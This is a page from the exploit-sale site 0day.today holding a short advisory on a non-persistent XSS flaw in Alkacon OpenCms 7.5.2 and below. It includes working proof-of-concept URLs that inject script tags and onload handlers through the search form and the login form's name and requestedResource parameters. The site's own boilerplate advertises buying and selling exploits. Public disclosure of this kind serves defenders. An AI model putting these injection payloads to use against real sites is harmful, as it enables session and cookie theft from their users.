0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Alkakon OpenCms 7.5.2 and below non persistent XSS
================================================== Alkakon OpenCms 7.5.2 and below non persistent XSS ================================================== # Exploit Title: Alkakon OpenCms 7.5.2 and below non persistent XSS. # Author: EgoPL # Software Link: http://www.opencms.org/en/ # Version: 7.5.2 and below. # Tested on: Arch Linux + Apache Tomcat but it's OS independent. # Description of the webapp: OpenCms is a complete and powerful open source web content management system. Alkacon Software GmbH is the official maintainer and the major contributor for OpenCms. OpenCms provides powerful features especially suited for medium and large enterprise internet or intranet applications. OpenCms is a Java and XML based system, completly build from open source components. This means OpenCms be deployed on almost any existing IT infrastructure without high licensing costs. # XSS by the Wikipedia. Cross-site scripting holes are web application vulnerabilities which allow attackers to bypass client-side security mechanisms normally imposed on web content by modern browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are therefore a special case of code injection. # Proof of concept (Because I need to sleep and I dont want to do anything more elaborated, anyway, that's a "dummy bug" Search Form: http://www.example.com/opencms/search.html?action=search&searchPage=1&query=>"><script>alert("EgoPL says: Hi, I'm in a XSS"</script>&submit=GO Login-form (not the admin login form and It's located in extra in the "demo_en" default installation of OpenCMS but really can be in the index or anywhere, name and requestedResource are vulnerable.) Using name: http://www.example.com/opencms/extra/login.html?name=<body+xonload=alert("I'm at @EgoPL in Twitter">&password=securepassword&action=login&requestedResource=%252Fdemo_en%252Fextra%252Fextranet%252Findex.html Using requestedResource: http://www.example.com/opencms/extra/login.html?name=EgoPL&password=4815162342&action=login&requestedResource=>"><script>alert("I love Lost, I saw today Lost 6x04"</script> # 0day.today [2024-11-15] #